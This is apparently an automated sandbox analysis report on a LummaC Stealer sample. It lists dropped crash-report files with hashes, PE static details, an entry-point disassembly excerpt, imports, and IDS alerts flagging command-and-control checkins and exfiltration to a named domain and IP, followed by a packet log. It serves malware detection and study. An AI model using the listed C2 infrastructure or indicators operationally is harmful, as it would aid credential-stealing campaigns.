	freebienotes.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	FreebieNotes.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	FreebieNotes.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vPqd8HLs88.exe_85fa23ae9a53a3ddc9b6e6dbb1d3e5533a89b8_701cd611_dbeb143d-5b01-4748-a91b-f8a0c55b228f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0060255551747783
Encrypted:	false
SSDEEP:	96:0EvVicsxh11yL56tQXIDcQIc6LcwcE+cw33K+HbHg/opAnQk3dDDWpsjOyWMmdDR:0K4cT0GPcwkjTjpyiXzuiFgZ24IO8b
MD5:	11AF20242EA3EF1DB0DAC27BD7F2B997
SHA1:	83B982D090B72B246E45FB08564F14FCA6B9393A
SHA-256:	9E613B0887FBA7C8E7E0409CE2D7BFF2AC89791853D4B34775B51DAAB50DD571
SHA-512:	CBEE866EC654C2271C38BB22C07ACA14F1BF9DF7E04D106F96CC7C98490117DC0C13458C4858AC76E484B6736B7BB43C30F270DEBB1C4556D8FBBE545E2A838F
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.4.8.3.5.9.6.8.3.5.6.9.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.4.8.3.5.9.7.3.2.0.0.7.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.b.e.b.1.4.3.d.-.5.b.0.1.-.4.7.4.8.-.a.9.1.b.-.f.8.a.0.c.5.5.b.2.2.8.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.1.a.2.9.b.5.-.7.c.0.6.-.4.5.c.2.-.8.a.e.5.-.4.b.b.f.9.7.f.0.d.1.5.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.P.q.d.8.H.L.s.8.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.b.c.-.0.0.0.1.-.0.0.1.3.-.a.5.2.d.-.6.9.6.b.9.9.4.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.1.b.d.9.7.8.c.e.9.5.5.7.8.0.9.5.4.7.0.e.e.5.7.8.8.b.9.c.6.f.a.0.0.0.0.f.f.f.f.!.0.0.0.0.a.e.a.3.2.e.5.1.c.1.d.5.4.9.d.e.7.7.9.d.d.1.3.6.0.0.8.0.6.9.6.d.9.e.3.8.7.1.e.a.!.v.P.q.d.8.H.L.s.8.8...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC09D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Dec 12 13:26:37 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	51308
Entropy (8bit):	2.7331408282200513
Encrypted:	false
SSDEEP:	384:mlT/lVCyeB2wLDAKdO5qGV/aaoQB/32y0:CeyeBbLDAjtAw/3A
MD5:	963AF44FA46F1F85C6B22C986EC4E57D
SHA1:	50ED936DECD88247AFF84B529569766C7764DFD0
SHA-256:	66E76E350DA349BF5A70342FE67E3CAC342470DC896B726D53AD6732716E7AF1
SHA-512:	F28FFF7FB0E1B62E5EFD07842AA15C8D79EF66CEE0E10560DC3C2B8D478E59D2977E38F57241B4A134F483A168E94E0342734E5F19EF5297AF0A50F6D1296DDC
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........Zg............4...............H.......,...X...........`1..........`.......8...........T............@............... ..........p"..............................................................................eJ.......#......GenuineIntel............T...........w.Zg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC179.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8388
Entropy (8bit):	3.695811581837652
Encrypted:	false
SSDEEP:	192:R6l7wVeJ8u6ngZ6YWrSUHxgmf2J0yc+54pDT89bMXsf4km:R6lXJ96n86YKSUHxgmf2J0yzBMcf6
MD5:	E6345205DA0D482B0A73DB633D48556B
SHA1:	C54B617ACF6720DD13F140A0E1182235753D32B5
SHA-256:	4B4C210DDD7104AED21A376340D62B30872C38E0CDA10FCA1DB3069BB74E3188
SHA-512:	A64A174037071FF0E1D3384E60015FDD0FFABC086EFAE60415310F6D5730FB35A86D829BA11325C517DE1BA61D77D4CF823006BE46DC612E5A2CBE7F8A80D5E1
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC1A9.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4686
Entropy (8bit):	4.444644083553059
Encrypted:	false
SSDEEP:	48:cvIwWl8zs6Jg77aI9NqWpW8VYpYm8M4J44FY+q8vT1kHaId:uIjfII7bL7VVJOKhkHaId
MD5:	9BC2FE3D763DA2AC1726F6BEE9DBDCAE
SHA1:	54377B5479514DE8AEC16C92632B41B12D5DF310
SHA-256:	D36AB3595098E8DB8DBA713A9D72D61F1495390DED308DF92E7C7329004FA151
SHA-512:	F4F09C974B2AFCD6581E0C7ABD1C8C0C98E48AC0BCB8B74FE098A1E9AFFCB5BFB1E475EC5FA767804B15B50977D767FC416C366DF1156965C97E21E4154E1724
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="628109" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.2959747477659835
Encrypted:	false
SSDEEP:	6144:/41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+K8mBMZJh1Vjv:w1/YCW2AoQ0Nis8wMHrVL
MD5:	30F4350D03F53320EF5F01F9A0E32720
SHA1:	9D5AC9BB52E7E0F597A1F33E53714314013FEC2C
SHA-256:	5C6A45834A3DC8A8C8EF7235324A7383C25CF99B64F60F2C5A8C8A3129FB7E43
SHA-512:	A267AADC7837DB67C71F0473F07EFA166C455E3AB2EE04C068EF2E7B94ED680053979E38F5D76142C120844095727BC9D184B62D98403E37F858A6B5766B6951
Malicious:	false
Reputation:	low
Preview:	regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..-x.L...............................................................................................................................................................................................................................................................................................................................................O9L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.004523161846587
TrID:	Win32 Executable (generic) a (10002005/4) 99.55% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	vPqd8HLs88.exe
File size:	392'704 bytes
MD5:	38a50f01c6d152ccdfa39db654923c5a
SHA1:	aea32e51c1d549de779dd1360080696d9e3871ea
SHA256:	074f68cba07911707860af2932fda77dfae0f0eb978cbadc4f8b64cbb9be1579
SHA512:	51dc88f3b1686eedea545f37243a5beeb63ad64e121bb9aaf22e5699d39e18765764a5737a63b980530c5c6bf29c7896269928a96ee3207a092335da9c0a9a16
SSDEEP:	6144:UYLr3e+d1STbKJ5yKpgD75e4qZmzbiCvYOxU:R/3ZST+NyULibiLMU
TLSH:	9984F22276A0C432C7568635C421EEB15FBFB83257958A4B77281B3F9E306C1DA3A357
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'...F...F...F.......F.......F.......F.......F...F...F.......F.......F.......F..Rich.F..........PE..L.....Df.................^.

File Icon


Icon Hash:	63796dc961436e0f

Static PE Info

General

Entrypoint:	0x40448f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6644FC02 [Wed May 15 18:16:34 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	c55ba1570e0a8d1efaf9700a357312b9

Entrypoint Preview

Instruction
call 00007FE6ACF1DFAEh
jmp 00007FE6ACF1997Eh
mov edi, edi
push ebp
mov ebp, esp
push esi
lea eax, dword ptr [ebp+08h]
push eax
mov esi, ecx
call 00007FE6ACF1E02Eh
mov dword ptr [esi], 00401244h
mov eax, esi
pop esi
pop ebp
retn 0004h
mov dword ptr [ecx], 00401244h
jmp 00007FE6ACF1E0C6h
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov dword ptr [esi], 00401244h
call 00007FE6ACF1E0B3h
test byte ptr [ebp+08h], 00000001h
je 00007FE6ACF19B09h
push esi
call 00007FE6ACF19379h
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+08h]
mov eax, dword ptr [edi+04h]
test eax, eax
je 00007FE6ACF19B49h
lea edx, dword ptr [eax+08h]
cmp byte ptr [edx], 00000000h
je 00007FE6ACF19B41h
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [esi+04h]
cmp eax, ecx
je 00007FE6ACF19B16h
add ecx, 08h
push ecx
push edx
call 00007FE6ACF1E10Fh
pop ecx
pop ecx
test eax, eax
je 00007FE6ACF19B06h
xor eax, eax
jmp 00007FE6ACF19B26h
test byte ptr [esi], 00000002h
je 00007FE6ACF19B07h
test byte ptr [edi], 00000008h
je 00007FE6ACF19AF4h
mov eax, dword ptr [ebp+10h]
mov eax, dword ptr [eax]
test al, 01h
je 00007FE6ACF19B07h
test byte ptr [edi], 00000001h
je 00007FE6ACF19AE6h
test al, 02h
je 00007FE6ACF19B07h
test byte ptr [edi], 00000002h
je 00007FE6ACF19ADDh
xor eax, eax
inc eax
pop edi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax]
cmp eax, 00004F4Dh

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x56338	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x3b68	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2db8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1c0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x55d9e	0x55e00	79d72bf6e41d71b228b034879ff4d32d	False	0.6266432405385735	data	6.294226530596211	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x57000	0xaba8	0x6000	642fe6d08ca7c0792dfc90ced29f2b05	False	0.08064778645833333	data	0.9446164978916606	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x62000	0x3b68	0x3c00	3625b43b5dfd47c9eb7ae9359f38404a	False	0.44296875	data	3.952106888863158	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x62210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.5345622119815668
RT_ICON	0x62210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.5345622119815668
RT_ICON	0x628d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.4101659751037344
RT_ICON	0x628d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.4101659751037344
RT_ICON	0x64e80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.44680851063829785
RT_ICON	0x64e80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.44680851063829785
RT_STRING	0x65570	0x144	data	Tamil	India	0.5370370370370371
RT_STRING	0x65570	0x144	data	Tamil	Sri Lanka	0.5370370370370371
RT_STRING	0x656b8	0x4aa	data	Tamil	India	0.44472361809045224
RT_STRING	0x656b8	0x4aa	data	Tamil	Sri Lanka	0.44472361809045224
RT_ACCELERATOR	0x65318	0x50	data	Tamil	India	0.825
RT_ACCELERATOR	0x65318	0x50	data	Tamil	Sri Lanka	0.825
RT_GROUP_ICON	0x652e8	0x30	data	Tamil	India	0.9375
RT_GROUP_ICON	0x652e8	0x30	data	Tamil	Sri Lanka	0.9375
RT_VERSION	0x65368	0x204	data			0.5445736434108527

Imports

DLL	Import
KERNEL32.dll	EnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, GetLogicalDriveStringsW, InterlockedCompareExchange, WriteConsoleInputA, SetComputerNameW, FreeEnvironmentStringsA, GetModuleHandleW, EnumCalendarInfoExW, EscapeCommFunction, GetCurrencyFormatA, EnumTimeFormatsA, TlsSetValue, GetVolumeInformationA, LoadLibraryW, GetCalendarInfoW, SetVolumeMountPointA, FindNextVolumeW, GetFileAttributesW, SetComputerNameExW, FindNextVolumeMountPointW, GetDevicePowerState, InterlockedIncrement, VerifyVersionInfoW, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, BackupWrite, CreateJobSet, CopyFileA, GetTempFileNameA, LoadLibraryA, SetCalendarInfoW, EnumDateFormatsA, GlobalUnWire, GetCurrentDirectoryA, OpenEventW, GetShortPathNameW, GetVersionExA, GetDiskFreeSpaceExW, ReadConsoleInputW, SetFileAttributesW, LCMapStringA, GetComputerNameA, CreateFileA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, TerminateProcess, IsDebuggerPresent, HeapFree, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, SetFilePointer, CloseHandle, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, RaiseException, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, InitializeCriticalSectionAndSpinCount, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetModuleHandleA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
ADVAPI32.dll	ReadEventLogW
ole32.dll	CoSuspendClassObjects
WINHTTP.dll	WinHttpCheckPlatform

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-12T14:26:17.083365+0100	2058039	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz)	1	192.168.2.10	61720	1.1.1.1	53	UDP
2024-12-12T14:26:18.661689+0100	2058040	ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI)	1	192.168.2.10	49702	104.21.32.1	443	TCP
2024-12-12T14:26:18.661689+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49702	104.21.32.1	443	TCP
2024-12-12T14:26:19.383685+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.10	49702	104.21.32.1	443	TCP
2024-12-12T14:26:19.383685+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.10	49702	104.21.32.1	443	TCP
2024-12-12T14:26:20.688667+0100	2058040	ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI)	1	192.168.2.10	49703	104.21.32.1	443	TCP
2024-12-12T14:26:20.688667+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49703	104.21.32.1	443	TCP
2024-12-12T14:26:21.565178+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.10	49703	104.21.32.1	443	TCP
2024-12-12T14:26:21.565178+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.10	49703	104.21.32.1	443	TCP
2024-12-12T14:26:23.132759+0100	2058040	ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI)	1	192.168.2.10	49704	104.21.32.1	443	TCP
2024-12-12T14:26:23.132759+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49704	104.21.32.1	443	TCP
2024-12-12T14:26:24.296971+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.10	49704	104.21.32.1	443	TCP
2024-12-12T14:26:25.684335+0100	2058040	ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI)	1	192.168.2.10	49705	104.21.32.1	443	TCP
2024-12-12T14:26:25.684335+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49705	104.21.32.1	443	TCP
2024-12-12T14:26:28.259338+0100	2058040	ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI)	1	192.168.2.10	49706	104.21.32.1	443	TCP
2024-12-12T14:26:28.259338+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49706	104.21.32.1	443	TCP
2024-12-12T14:26:31.679753+0100	2058040	ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI)	1	192.168.2.10	49707	104.21.32.1	443	TCP
2024-12-12T14:26:31.679753+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49707	104.21.32.1	443	TCP
2024-12-12T14:26:33.967404+0100	2058040	ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI)	1	192.168.2.10	49709	104.21.32.1	443	TCP
2024-12-12T14:26:33.967404+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49709	104.21.32.1	443	TCP
2024-12-12T14:26:36.032074+0100	2058040	ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI)	1	192.168.2.10	49711	104.21.32.1	443	TCP
2024-12-12T14:26:36.032074+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.10	49711	104.21.32.1	443	TCP
2024-12-12T14:26:37.268208+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.10	49711	104.21.32.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 14:26:17.438508034 CET	49702	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:17.438553095 CET	443	49702	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:17.438647985 CET	49702	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:17.441040993 CET	49702	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:17.441054106 CET	443	49702	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:18.661602020 CET	443	49702	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:18.661689043 CET	49702	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:18.664968014 CET	49702	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:18.664985895 CET	443	49702	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:18.665348053 CET	443	49702	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:18.712224960 CET	49702	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:18.744909048 CET	49702	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:18.744909048 CET	49702	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:18.745050907 CET	443	49702	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:19.383693933 CET	443	49702	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:19.383785963 CET	443	49702	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:19.383835077 CET	49702	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:19.385247946 CET	49702	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:19.385247946 CET	49702	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:19.385271072 CET	443	49702	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:19.385282993 CET	443	49702	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:19.471503973 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:19.471550941 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:19.472029924 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:19.472153902 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:19.472167015 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:20.688476086 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:20.688667059 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:20.819793940 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:20.819813013 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:20.820210934 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:20.828087091 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:20.828088045 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:20.828262091 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.565188885 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.565233946 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.565263033 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.565284014 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.565294981 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.565330029 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.565459013 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.565468073 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.565651894 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.567881107 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.567938089 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.572928905 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.581449032 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.581545115 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.581553936 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.635341883 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.685367107 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.727946043 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.727962017 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.757225037 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.757421017 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.757430077 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.760910988 CET	443	49703	104.21.32.1	192.168.2.10
Dec 12, 2024 14:26:21.761079073 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.761292934 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.761292934 CET	49703	443	192.168.2.10	104.21.32.1
Dec 12, 2024 14:26:21.761332989 CET	443	49703	104.21.32.1	192.168.2.10
